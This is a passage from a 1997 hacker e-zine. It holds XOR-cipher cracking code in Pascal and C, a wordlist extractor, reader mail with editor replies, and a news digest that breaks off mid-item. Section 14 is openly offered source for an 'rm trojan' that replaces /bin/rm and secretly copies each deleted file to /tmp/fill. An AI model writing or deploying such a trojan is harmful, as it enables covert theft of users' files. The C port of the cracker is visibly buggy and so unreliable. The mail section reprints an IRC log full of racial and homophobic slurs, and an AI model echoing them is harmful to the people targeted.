key, buffer : array[1..MAXKEY] of Byte;
count, maxcount : array[1..MAXKEY] of Integer;
inpath, outpath : String;
minkeysize, maxkeysize, i : Integer;
procedure Crack(Filename : String; keysize : Integer);
var
file1: file;
i,j, result: integer;
b : byte;
begin
Write('Cracking');
Assignfile(file1,Filename);
Reset(file1,1);
for i := 1 to KeySize do
begin
key[i] := 0;
maxcount[i] := 0;
end;
for i:=0 to 255 do
begin
seek(file1,0);
for j := 1 to KeySize do
count[j] := 0;
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do
begin
b:= i xor buffer[j];
if b in [10,13,32,97..122] then count[j] := count[j] + 1;
end;
end;
for j:=1 to keysize do if count[j]>maxcount[j] then
begin
key[j]:=i;
maxcount[j]:=count[j];
end;
Write('.');
end;
WriteLn('Done!');
closefile(file1);
end;
procedure Decrypt(infile, outfile : String; keysize : Integer);
var
file1,file2: file;
i,j, result: integer;
begin
Write('Decrypting');
assignfile(file1,infile);
reset(file1,1);
assignfile(file2,outfile);
rewrite(file2,1);
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do buffer[j]:= buffer[j] xor key[j];
blockwrite(file2,buffer,result,i);
Write('.');
end;
closefile(file1);
closefile(file2);
WriteLn('Done!');
end;
begin
Write('Min key size: ');
ReadLn(minkeysize);
Write('Max key size: ');
ReadLn(maxkeysize);
Write('Enter ciphertext: ');
ReadLn(inpath);
for i := minkeysize to maxkeysize do
begin
outpath := ExtractFilePath(inpath) + IntToStr(i) + '.txt';
Crack(inpath, i);
WriteLn;
Decrypt(inpath, outpath, i);
WriteLn;
end;
end.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 12 of 16
genericrack2.c
By Shok, Staff Writer
/* genericrack2 by The Messiah converted to C by Shok */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#define MAXKEY 1024
char key[MAXKEY], buffer[MAXKEY];
int count[MAXKEY], maxcount [MAXKEY];
char *inpath, *outpath;
int minkeysize, maxkeysize, i;
void Crack(char *Filename, int keysize)
{
FILE *file1;
int i, j, result = 0;
char b;
char ifeof;
printf("Cracking");
sleep(1);
file1=fopen(Filename, "r");
for (i=1; i <= keysize + 1; i++) {
key[i] = 0;
maxcount[i] = 0;
}
for (i=0; i < 256; i++) {
for (j=1; j < keysize + 1; j++) count[j] = 0;
while (ifeof != EOF) {
/* Get the size in bytes */
ifeof = getc(file1);
result += 1;
if (result >= sizeof(buffer)) break;
}
rewind(file1);
while (!feof(file1)) fgets(buffer, sizeof(buffer), file1);
result -= 1; /* Get rid of extra char */
for (j=1; j < result + 1; j++) {
b = i ^ buffer[j];
if ((b == 10) || (b == 13) || (b == 32) || (b == 97) || ((b > 97) && (b < 123))) count[j] = count[j] + 1;
}
}
for (j=1; j < keysize + 1; j++) {
if (count[j] > maxcount[j]) {
key[j]=i;
maxcount[j]=count[j];
putchar('.');
}
}
printf("\nDone!\n");
fclose(file1);
}
void Decrypt(char *infile, char *outfile, int keysize)
{
FILE *file1, *file2;
int i, j, result;
char ifeof;
printf("Decrypting");
sleep(1);
file1=fopen(infile, "r");
file2=fopen(outfile, "w");
while (ifeof != EOF) {
/* Get the size in bytes */
ifeof = getc(file1);
result += 1;
if (result >= sizeof(buffer)) break;
}
rewind(file1);
while (!feof(file1)) fgets(buffer, sizeof(buffer), file1);
result -= 1; /* Get rid of extra char */
for (j=1; j < result + 1; j++) {
buffer[j] = buffer[j] ^ key[j];
putchar('.');
}
result = fputs(buffer, file2); /* does this have to only */
/* write 'i' bytes? */
fclose(file1);
fclose(file2);
printf("\n\nDone!\n");
}
void main(int argc, char **argv)
{
printf("Min key size: ");
scanf("%d", &minkeysize);
printf("Max key size: ");
scanf("%d", &maxkeysize);
printf("Enter ciphertext: ");
scanf("%s", &inpath);
for (i = minkeysize; i < maxkeysize; i++) {
outpath = "cracked.txt";
Crack(inpath, i);
putchar('\n');
Decrypt(inpath, outpath, i);
putchar('\n');
}
}
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 13 of 16
word.c
By memor, thtj staff writer
memor@mygale.org
/*
Here is some wordlist processing program
fastly done by memor for thtj16
realesed on Tue Oct 21 18:55:02 199 v0.001
well , i'll comment the code , if u want to improve it,
no matters if u want to improve it.. :)
way u could do to improve it:
-make structurs type file to stock words got and
wont write exactly the 2 same words in the outpout file
-make a third argument as a integer type (with atoi)
to put a word size to save.. instance: dont save the words
in the outpout file if they have less than 3 caracters
l8r,
memor@mygale.org
*/
/* includes necessary to commands printf..,fopen..*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* main function using arguments (argc, argv) */
void main(int argc,char *argv[])
{
/* defining FILE type pointers for input file and
outpout file
char type variable cara for read/wrote caracter
integer type test and testa for testing when a
caracter has to be replaced as a \n in the outpour file,
or when their is twice caracter to be replaced..
string char(30) type for nsource and ndest,
for the input and outpout filenames */
FILE *source;
FILE *dest;
char cara;
int test=0;
int testa=1;
char nsource[30];
char ndest[30];
/* checking their is enough arguments */
if(argc<3)
{
printf("memor 1997-98 v0.01\n");
printf("usage: %s textfile wordfile\n",argv[0]);
exit(1);
}
/* writting in nsource the source filename
writting in ndest the destination filename */
sprintf(nsource,"%s",argv[1]);
sprintf(ndest,"%s",argv[2]);
/* opening source and cheking btw if source exists */
source=fopen(nsource,"r");
if(source==NULL)
{
printf("File does not exists..\nAborted..\n");
exit(1);
}
/* opening outpout file and checking no errors in it */
dest=fopen(ndest,"w");
if(source==NULL)
{
printf("Can't open file..\nAborted..\n");
exit(1);
}
/* begining processing and ending on EOF caracter */
do
{
/* getting caracter from input file */
cara=fgetc(source);
test=0;
/* checking if caracter between 0 and 9,
a and z or A and B and writting it if the condition
is true. */
if(cara>'0'-1 && cara<'9'+1)
{
fputc(cara,dest);
test=1;testa=0;
}
if(cara>'a'-1 && cara<'z'+1)
{
fputc(cara,dest);
test=1;testa=0;
}
if(cara>'A'-1 && cara<'Z'+1)
{
fputc(cara,dest);
test=1;testa=0;
}
/* if the condition was FALSE and no \n written
in the outpout file before, writting it */
if(test==0 && testa!=1)
{
fputc(13,dest);
fputc(10,dest);
testa=1;
}
}
while(cara!=EOF);
/* closing file for ending that clean job :) */
fclose(dest);
fclose(source);
}
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 14 of 16
rm.c Fix
By Shok, Staff Writer
shok@sekurity.org
/* --------------------------------- */
/* rm trojan by --==+*~(Shok)~*+==-- */
/* Email: shok@sekurity.org */
/* --------------------------------- */
#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char **argv)
{
struct stat filestats;
int i;
int recursive, verbose, force, interactive;
int c;
if (argc > 2) {
while((c = getopt (argc, argv, "Rrifv:")) != -1)
switch (c)
{
case 'R':
case 'r':
recursive = 1;
break;
case 'i':
interactive = 1;
break;
case 'f':
force = 1;
break;
case 'v':
verbose = 1;
break;
case '?':
if(isprint (optopt)) fprintf (stderr, "Unknown option '-%c'.\n", optopt);
else fprintf (stderr, "Unknown option character `\\x%x'.\n", optopt);
exit(1);
default:
break;
}
} else if (argc == 2) {
setenv("PROGRAM", argv[1], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak", "rm", argv[1], NULL);
unsetenv("PROGRAM");
exit(0);
} else {
exit(0);
}
/* Well....got a better idea? */
if ((interactive == 1) && (verbose != 1) && (force != 1) && (recursive != 1)) goto interactive;
if ((force == 1) && (verbose != 1) && (interactive != 1) && (recursive != 1)) goto force;
if ((verbose == 1) && (interactive != 1) && (force != 1) && (recursive != 1)) goto verbose;
if ((recursive == 1) && (verbose != 1) && (force != 1) && (interactive != 1)) goto recursive;
if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose != 1)) goto rf;
if ((recursive == 1) && (force != 1) && (interactive == 1) && (verbose != 1)) goto ri;
if ((recursive == 1) && (force != 1) && (interactive != 1) && (verbose == 1)) goto rv;
if ((recursive == 1) && (force == 1) && (interactive != 1) && (verbose == 1)) goto rfv;
/* If we made it to here something is wrong */
fprintf(stderr, "Unknown error.\n");
exit(1);
interactive:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}
exit(0);
force:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-f",argv[2],NULL);
}
exit(0);
verbose:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-v",argv[2],NULL);
}
exit(0);
recursive:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-r",argv[2],NULL);
}
exit(0);
rf:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[2],NULL);
}
exit(0);
ri:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-ri",argv[2],NULL);
}
exit(0);
rv:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rv",argv[2],NULL);
}
exit(0);
rfv:
for (i=2;i<argc;i++) {
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rfv",argv[2],NULL);
}
exit(0);
}
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 15 of 16
Oddville, THTJ
By Scud-O, Editor in Chief
scud@thtj.com
Oddville, THTJ for the Month of October
[01] Fwd: Bronc vs. Jericho, Modify
[02] eReEt MiXeD cApS hErE
[03] Help Wanted on IP Spoofing, g8 way2
[04] Information on the thtj Mailing List, FH
[05] Is The Mailing List Up Yet?, Peter
[06] No New Membership Openings
[07] Praise.
[08] Sex Sites Will Never Be In THTJ, John Doe
[09] Hackers of the world, please help you? , Acid Burn
[10] Let's Link,Frank Bertotti
[11] Havoc, The Program?
[12] Trying to Learn, Jeff
[13] AOL Chat Room 'Punter', HESTUD
Note: Well, once again, thanks to nethosting.com, Oddville is light on
content, since well, there is a less that 10% chance that your mail actually
got thru nethosting's mail servers! Next month, this should all be resolved,
since we are *finally* moving.
--- [ Fwd: Bronc vs. Jericho ]
Date: Thu, 02 Oct 1997 03:05:22 -0400
From: Modify
Organization: Global kOS
X-Mailer: Mozilla 2.01KIT (Win95; U)
To: xxxxx@xxx.xxx
CC: xxxxx@xxxxx.xxx, xxxx@xxxxxx.xxx, xxx@xxxxxxxxxxx.xxx
Subject: [Fwd: Forwarded mail....]
Welp, good ol bronc has done it again... he now has slammed me and
Jericho on this log that Jericho has sent me... Jericho is the one
without the full address within the nick... he is (-[Bronc]-) and the
"real" bronc buster is [Bronc(Bronc_Bust@pwrrack38.succeed.net)]
--
Modify
----------oOo------------------------------------------0
HACP: http://members.tripod.com/~ListedBlack/index2.htm
Global kOS: http://www.thtj.com/kOS
ls -l | awk '{size
= size + $5; print
size}'
Security is an on going process.. just dont fall behind
----------oOo------------------------------------------0
Received: from mx01.erols.com (mx01.erols.com [205.252.116.65]) by mail0.erols.com (8.8.5/8.7.3/970701.001epv) with ESMTP id AAA17642 for <modify@mail0.erols.com>; Thu, 2 Oct 1997 00:36:51 -0400 (EDT)
From: jericho@dimensional.com
Received: from blackhole.dimensional.com (blackhole.dimensional.com [208.206.176.10])
by mx01.erols.com (8.8.5/8.8.5/MX-mnd) with ESMTP id AAA25408
for <modify@erols.com>; Thu, 2 Oct 1997 00:36:50 -0400
Received: from flatland.dimensional.com (sendmail@flatland.dimensional.com [208.206.176.24])
by blackhole.dimensional.com (8.8.7/8.8.nospam) with ESMTP id WAA06246
for <modify@erols.com>; Wed, 1 Oct 1997 22:36:48 -0600 (MDT)
Received: from flatland.dimensional.com (718@flatland.dimensional.com [208.206.176.24])
by flatland.dimensional.com (8.8.7/8.8.7) with SMTP id WAA05944
for <modify@erols.com>; Wed, 1 Oct 1997 22:36:46 -0600 (MDT)
Date: Wed, 1 Oct 1997 22:36:46 -0600 (MDT)
To: Modify <modify@erols.com>
Subject: Forwarded mail....
Message-ID: <Pine.SUN.3.96.971001223641.3827F-100000@flatland.dimensional.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-UIDL: fab0bf073e
X-Mozilla-Status: 0001
pass this around.
[10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre a poor bitch
[10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I can see that now
[10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everything i was told was right
[10:19pm] (-[Bronc]-) At least I have a clue.
[10:19pm] (-[Bronc]-) I know how to hack for one thing, and I know the definition of slander
[10:19pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] good, then you know how lame your pals are
(this is between you and me, why bring others into it?)
[10:20pm] (-[Bronc]-) this has nothing to do with them. just your lame mail about me that you didnt have the balls to cc me in on.
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what mail?
[10:20pm] (-[Bronc]-) Yup.. the mail all about me and your stupid assumptions you dumb nigger.
(the mail said I was stalling on setting up a server in order to shut him down)
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you mean the one Modify sent out
(what, he sent it from your account? The headers were not forged.)
[10:20pm] (-[Bronc]-) no.. the one YOU sent out.
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] telling everyone how you were keeping me shut donw?
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] making fu of me
(my *reply* made fun of you)
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I sent no mail
[10:20pm] (-[Bronc]-) I sent out the reply you dumb bitch
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] I got modifys and yours
[10:20pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] both dogging me
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] you need to pull your head out
[10:21pm] (-[Bronc]-) The server wasnt up until a week ago. Had nothing to do with shutting you down
[10:21pm] (-[Bronc]-) You need to pull more than your head out.
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] your pal is playing you for a fool
[10:21pm] (-[Bronc]-) get your dick out of a horses ass and wake up.
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] Modify has his dick in your ass
[10:21pm] (-[Bronc]-) better than a horse
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] and you dont even know it
[10:21pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a sucker
[10:21pm] (-[Bronc]-) yes, you are.
[10:22pm] (-[Bronc]-) you got suckered by Carolyn of all people.
[10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] suckered?
[10:22pm] (-[Bronc]-) yup
[10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] man he is fucking up in the ass
[10:22pm] (-[Bronc]-) You almost have a clue about the whole picture.
[10:22pm] (-[Bronc]-) go away fag
[10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] how gullible
[10:22pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] everyone laughs at you outside your little sircle
[10:22pm] (-[Bronc]-) sure they do
[10:23pm] (-[Bronc]-) circle btw
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] just like I do
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youll see soon enough
(OOh! Just like Carolyn, a vague threat)
[10:23pm] (-[Bronc]-) like you matter? you cant hack your way out of a horses ass.
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] it won;t be long tell he wants to jizz on you to
[10:23pm] (-[Bronc]-) what, another vague threat? imagine that.
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] grow up
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] youre soooooooo small
(then what does that make you?)
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] lame ass spending 24/7 on IRC k/b ppl
(Why the *fuck* do people assume that? I am actively typing on IRC less than
an hour a day.)
[10:23pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] listening to that lame ass
[10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] letting him play you for a fool
[10:24pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha
[10:24pm] (-[Bronc]-) why the fuck you do you assume i am here 24/7? you are so ignorant.
[10:24pm] (-[Bronc]-) go away monkey
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] loser
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] send me some pics of him jizzinf on you
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahah
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] what a chump
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] auto kick/ban
(that was a manual kick)
[10:25pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] wont even talk like a mature adult
("loser" "what a chump" and all the comments about jizz.. and you say
I am not mature? pot -> kettle -> black)
[10:26pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] but i forgot, youre an IRC kiddie
(I can still hack, something you can't. The only thing you can do, code HTML,
is barely a skill, and you do it very poorly.)
[10:26pm] (-[Bronc]-) an irc kiddie that knows something about security. an irc kiddie that is on maybe half an hour a day. you ignorant bitch
[10:26pm] (-[Bronc]-) go the fuck away horse ass
[10:26pm] (-[Bronc]-) you cant even do HTML worth shit lamer
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats why youre idle time was over 2 hours
(exactly. Because I check messages here and there. Duh)
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] hahaha
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] little kid
[10:27pm] (-[Bronc]-) exactly. i check in here and there for messages. duh
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] thats all you are
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] long haired kiddie
[10:27pm] (-[Bronc]-) little kid that is a lot smarter than you. must make you feel like an ass.
[10:27pm] [Bronc(Bronc_Bust@pwrrack38.succeed.net)] pleas
[10:27pm] (-[Bronc]-) hair length? that is a mature insult
[10:27pm] (-[Bronc]-) ignoring your dumb ass
--- [ eReEt MiXeD cApS hErE ]
Date: Fri, 03 Oct 1997 03:21:09 -0700
From: xxxx@xxxxxxxxxx.xxx (xxxxx, xxxxx)
X-Mailer: Mozilla 3.0 (Win95; U; 16bit)
To: scud@thtj.com
Subject: SuP
yO dAwG.i Am KiNd Of NeW aT tHiS sO bArE wItH mE.dO yOu HaVe AnY hAkInG
fIlEs I cAn DoWnLoAd.I rEaD mOsT oF tHe FiLeS yOu GoT bUt I nEeD sOmE
fOr ReFrEnCe.
[ try thtj.com/files.html for a few, but get off of your lazy butt, and do
some searching for files. A site that readily comes to mind is my good friend
JP's site: http://www.antionline.com/ . Oh, and by the way, learn to change
your name in Netscape Mail, since i really *doubt* that your mom would
approve of you 'hAkInG'. ]
--- [ Help Wanted on IP Spoofing ]
X-Originating-IP: [130.133.217.173]
From: "g8 way2" <xxxxxx@xxxxxxx.com>
To: scud@thtj.com
Subject: i dont know where to go?
Date: Sun, 05 Oct 1997 14:44:37 PDT
hello, and sorry for using you time, but i did not know where to go with
my question.. Is it possible to spoof, say an ftp-server, with a
different hostname, than the one you're dialing in from.. i'm not
talking about altering your ID, i know how to do that, but how to alter
your ip..i've read some of your mags, but couldn't find an answer :-(
Sorry if i'm at the complete wrong table here, but if you know where i
can obtain info on this i would be very gratefull too,,,,
btw your e-zine is good reading ( <--- = obligatory asslicking line)
thanks,,,
g8way2
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
[ Go get jizz.c ( thtj.com/jizz.c ) of the like, and run it on your unix box.
All the instructions should be there, and they are fairly self explainitory
However, you must be root for this to work, and have a fair knowledge of
unix, so this is not for the beginner. ]
--- [ Information on the thtj Mailing List ]
Date: Mon, 6 Oct 1997 06:37:47 -0500 (CDT)
X-Sender: xxxxx@xxx.com
X-Mailer: Windows Eudora Light Version 1.5.2
To: scud@thtj.com
From: FH
Subject: Welcome to thtj
See i joined.. but you might want to add WHAT ADDRESS YOU MAIL TOO NOW. it
doesnt say 'to send out mail send it to xxxxxxx@terminus.orc.ca
Or is that even where it goes? You want me to write up a file for this shit
so when you subscribe it sends back with like stuff about the list and all
that other information?
>Date: Sun, 5 Oct 1997 19:38:25 -0400 (EDT)
>X-Authentication-Warning: terminus.orc.ca: majordomo set sender to
owner-thtj@terminus.orc.ca using -f
>To: typeo@qni.com
>From: majordomo@terminus.orc.ca
>Subject: Welcome to thtj
>Reply-To: majordomo@terminus.orc.ca
>
>--
>
>Welcome to the thtj mailing list!
>
>Please save this message for future reference. Thank you.
>
>If you ever want to remove yourself from this mailing list,
>you can send mail to <majordomo@terminus.orc.ca> with the following
>command in the body of your email message:
>
> unsubscribe thtj
>
>or from another account, besides xxxxx@xxx.com:
>
> unsubscribe thtj xxxxx@xxx.com
>
>If you ever need to get in contact with the owner of the list,
>(if you have trouble unsubscribing, or have questions about the
>list itself) send email to <owner-thtj@terminus.orc.ca> .
>This is the general rule for most mailing lists when you need
>to contact a human.
>
> Here's the general information for the list you've subscribed to,
> in case you don't already have it:
>
>
>
[ Editor's Note: The THTJ Mailing list we have it for THTJ Distro _only_.
This majordomo is not an open majordomo, we will only be distroing thtj from
it. We are currently setting up another domo that will be open, so all of you
mugs can talk til your dead. ]
--- [ Is The Mailing List Up Yet? ]
From: "Peter xxx" <xxx@xxx.xx-xxx.xxx-xxxxxx.xx>
Organization:
To: webmaster@thtj.com
Date: Wed, 1 Oct 1997 13:29:03 MET
Subject: I don't like coffee ...
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.53/R1)
... but I'd like to know when you will give live to the mailing-list
mentioned on your site...
Greetings from Germany - actually raining :(
Peter
[ Peter, you are in luck, thtj has opened the mailing list. To join it,
send mail to: majordomo@terminus.orc.ca , with the body reading :
subscribe thtj <your e-mail here>
]
--- [ No New Membership Openings ]
Date: Sun, 5 Oct 1997 18:21:57 -0400 (EDT)
From: xxxxxxx <xxxxxxx@xxxxxxxxxx.xxx>
To: thtj@thtj.com
Subject: memership
hi
sorry to bore you with shit like that, but i am interesting in becoming a
member of your group and wonder if you have any tests or something..i also
wanna wask if i have to be a member to write articles for the mag. thanks
.. bye 4 now
--
xxxxxxx
[ Just so everyone knows, neither thtj or hbs are looking for new members.
thtj does incourage people to write for thtj, since it is open for anyone
and everyone to write for, and after several articles, we may let you onto
the staff as a staff writer. However, there are no tests for this, so just
go write some articles. ]
--- [ Praise. ]
Date: Tue, 07 Oct 1997 19:50:13 -0500
From: xxxxxxx <xxxxx@xxxxxx.com>
Organization: xxxxxx
X-Mailer: Mozilla 4.01 [en] (Win95; U)
To: scud@thtj.com
Subject: Hey
Just wanna give you big props on issue 15 yet another great thtj, you
guys own. Keep up the good work...
[ Thank you, we try our best. ]
--- [ Sex Sites Will Never Be In THTJ ]
X-Originating-IP: [200.241.100.130]
From: "John Doe" <xxxxxx@hotmail.com>
To: scud@thtj.com
Subject: havoc
Date: Fri, 17 Oct 1997 14:36:33 PDT
Hi!
I think Havoc simply COOL! :)
I'd like to give a suggestion for the november edition: "How to hack sex
sites". Today many people use hacked accounts to enter porn sites and
teaching how to do it would be very helpful.
Thanks and good bye!
[ Two letters and one punctuation for you: NO!
THTJ Will *never* publish anything about sex sites. That is just plain
sick. There is no 'hacking' involved in sex sites, all you have to do, is
probably just card an account. This is not hacking, this is no anything
useful, so thtj will never print anything like this. Go get a girlfriend.]
--- [ Hackers of the world, please help you? ]
Date: Fri, 24 Oct 1997 23:28:27 -0700 (PDT)
From: Acid Burn <acid_burn555@yahoo.com>
Subject: HELP!!!
To: scud@thtj.com, keystroke@thepentagon.com, reaper@linenoise.org
Cc: thtj@thtj.com, alienphreak@linenoise.org
Hackers of the world PLEASE HELP ME!!!
I am in desperate need of your help!!!!
Please can you mail me all the passwords together with their User IDs
and which system they are for as well as all the dialup codes etc.
that you have in your collection.
This is URGENT!! Please reply as soon as possible.
(My friends life depends on it)
Please forward this message to all hackers you know.
Thanks a million.
Acid Burn
_____________________________________________________________________
Sent by Yahoo! Mail - http://mail.yahoo.com
[ What the fuck is this bull shit? You friend's life depends on collecting
passwd files? yea right. ]
--- [ Let's Link ]
Date: Sun, 26 Oct 1997 17:24:37 -0700 (MST)
From: grant@letzlink.com
To: scud@thtj.com
Subject: Let's Link
Visit Let's Link at http://www.letzlink.com/
I invite you to visit Let's Link .... perhaps, our Let's Link & Links section.
Although, our "Add Your Link" service is FREE, we do ask you to reciprocate
with a LINK at your site .... not required but highly appreciated. ....
please review our instructions for linking before adding your site.
Let's Link is a highly interactive Information Resource Center and a Global
Gateway to thousands of The Best Sites on the "Net". Primary links include:
Global Travel Guide; Education Network; Career Services; SharewareNET;
Product Showcase; Worldwide Marketplace, Art; Catalogs; Real Estate Corner;
Shoppers Paradise and much more. Let's Link is a family friendly site.
Our site visitation now exceeds 4,300 per/day! 25% Europe.... 70% North
America... 5% Asia
I hope you find our Information Resource Center useful.
Regards,
Frank Bertotti
http://www.letzlink.com
[ Sorry, but i *really* doubt that thtj.com would qualify as a 'family' site.]
--- [ Havoc, The Program? ]
From: AMando5454@aol.com
Date: Sat, 25 Oct 1997 17:06:43 -0400 (EDT)
To: thtj@thtj.com
Subject: Havoc
We are looking for the program, Havoc. If you have any information that you
think will be helpful, we would appreciate any help.
Thank You
[ Twice now i have gotten this. WHAT THE FUCK IS 'Havoc, the program'? i
demand to know. ]
--- [ Trying to Learn ]
Read-Receipt-To: "Jeff" <xxxxx@xxxxxx.net>
Priority: Normal
X-MSMail-Priority: Normal
To: scud@thtj.com
From: "Jeff" <xxxxx@xxxxxx.net>
Date: Fri, 31 Oct 97 09:01:31 PST
X-MIME-Autoconverted: from quoted-printable to 8bit by
id TAA11759
i will like to learn how to get programs to crack codes and to create virusis
please help
[ try going to yahoo and searching for information. ]
--- [ AOL Chat Room 'Punter' ]
From: HESTUD <xxxxxx@aol.com>
Date: Sat, 1 Nov 1997 05:05:54 EST
To: scud@thtj.com
Subject: how to get a punter
Organization: AOL (http://www.aol.com)
X-Mailer: Inet_Mail_Out (IMOv10)
dear scud-o
ive been searching your link and i think its very
interesting . i was wondering if you can send me a punter for aol chat rooms.
this would be a great help or least find out how i can get one.
hestud
[ try yahoo or something. ]
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 16 of 16
The News
Compiled by KungFuFox, Executive Editor
kungfufox@thtj.com
1 : Spammers beware: Usenet2 not for you
2 : S/MIME Cracked by a Screensaver
3 : Webmaster Lets Sites Hack Themselves
4 : High-Tech Burglar Alarms Expose Intruders
5 : WorldCom Bid Threatens BT-MCI Merger
6 : U.S. cell phone industry battles service thieves
7 : Junk Mail Giant Cyber Promotions Is Back Online
8 : Electric Outlets Could Be Link To the Internet
9 : Coming Soon: Net Access Through Power Lines
10: GTE Makes $28B Cash Offer For MCI
11: GeoCities Sites Blocked In South Korea
_____________________________________________________________
Spammers beware: Usenet2 not for you
Network World, September 22, 1997
A new, spam-free version of the Internet-based bulletin board system Usenet
is being developed. Called Usenet2 or U2, the network will use monitoring
software and a strict set of community rules to create a spam-free
environment. Spam refers to unwanted mass postings to Usenet discussion
groups. According to some estimates, 80% of the messages now posted on
Usenet are spam or spam "cancels," which are messages that try to delete
spam from servers. Several Internet service providers have agreed to support
Usenet2, including ZippoDot Com and PANIX. Usenet2 will use monitoring
software called Net-Monitor which can filter out binary posts and any post
that is being sent to more than 3 newsgroups. Systems that agree to carry
Usenet2 must also obey a strict set of rules including real return e-mail
addresses on postings. If a system breaks the rules, it can have its Usenet2
feed disconnected.
_____________________________________________________________
S/MIME Cracked by a Screensaver
